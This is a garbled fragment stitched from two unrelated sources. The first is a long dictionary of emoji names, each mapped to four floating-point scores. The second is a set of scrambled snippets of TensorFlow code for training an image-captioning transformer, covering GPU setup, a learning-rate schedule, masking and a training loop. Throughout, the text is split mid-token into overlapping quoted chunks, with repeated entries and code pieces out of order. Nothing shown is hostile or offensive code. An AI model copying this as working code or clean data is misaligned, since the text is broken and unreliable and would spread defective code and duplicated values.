0.17600000000000002,", "0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092,", "0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098,", "0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184,", "[0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3,", "\":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21,", "0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\":", "0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436,", "0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\":", "0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218,", "0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\":", "[0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239,", "\":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125,", "0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\":", "\":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149,", "\":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001,", "0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37],", "[0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001,", "0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13,", "0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145],", "\":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214,", "\":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465,", "0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204,", "0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11,", "0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002,", "0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217,", "0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\":", "\":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002,", "0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121],", "[0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191,", "0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\":", "[0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999,", "[0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002,", "0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22,", "[0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259,", "0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\":", "0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255],", "[0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002,", "0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\":", "0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369],", "0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999],", "\":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282,", "\":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154,", "0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096,", "0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309],", "[0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998,", "0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004],", "[0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998,", "\":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078,", "0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145],", "0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146],", "[0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414,", "0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213],", "[0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998,", "0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222,", "0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998,", "\":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516,", "0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\":", "0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271],", "\":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309,", "0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282],", "0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257,", "[0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203,", "0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263],", "0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179],", "0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\":", "0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165,", "0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\":", "[0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324,", "[0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155,", "\":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128,", "0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193],", "[0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214,", "[0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16,", "\":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294,", "0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408,", "0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114,", "0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375,", "\":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156,", "[0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214,", "0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055],", "\":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002,", "[0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002,", "{ \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996,", "0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\":", "[0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237,", "0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998,", "[0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161,", "[0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147,", "0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\":", "0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\":", "[0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327,", "\":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276,", "0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249],", "[0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075,", "[0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999,", "[0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094,", "0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996,", "[0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336,", "\":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257,", "[0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373,", "\":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002,", "0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21,", "0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\":", "0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\":", "0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349],", "0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151],", "0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321,", "\":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996,", "0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221],", "\":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267,", "[0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326,", "[0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21,", "0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\":", "\":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003,", "0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\":", "[0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302,", "0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161],", "0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278],", "0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996],", "0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\":", "0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233,", "0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002,", "0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002,", "\":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263,", "[0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126,", "\":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212,", "0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187,", "\":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228,", "0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396,", "[0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129,", "0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\":", "0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\":", "0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\":", "[0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244,", "0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\":", "0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095],", "0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\":", "0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121,", "0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002,", "0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385,", "0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16,", "0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264,", "\":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18,", "0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115,", "[0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999,", "[0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109,", "0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185],", "[0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29,", "\":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196,", "0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132]," ]
[ "mask - This should just be 1's # input shape should be (batch_size,", "# tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus:", "# and 4H (4x768) as feedforward size # Small Model num_layers = 4", "# Begin Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() #", "Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch", "self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step):", "-1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9,", "import visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ##", "the decoder. # This padding mask is used to mask the encoder outputs.", "captions to images ######################### prefix = './data/' save_prefix = prefix + \"features/\" #", "= 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1", "tqdm # our visual transformer code import visual_transformer as vt ####### GPU CONFIGS", "# Max length of captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split()))", "You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model =", "100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss", "# Use map to load the numpy files in parallel dataset = dataset.map(lambda", "# Visualize the schedule: uncomment to plot # import matplotlib.pyplot as plt #", "{:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {} secs\\n'.format(time.time() -", "= inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after tokenization # tfds", "we only took half validation examples so we dont need to split #", "combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp,", "= inputs['caption'].map(lambda x: 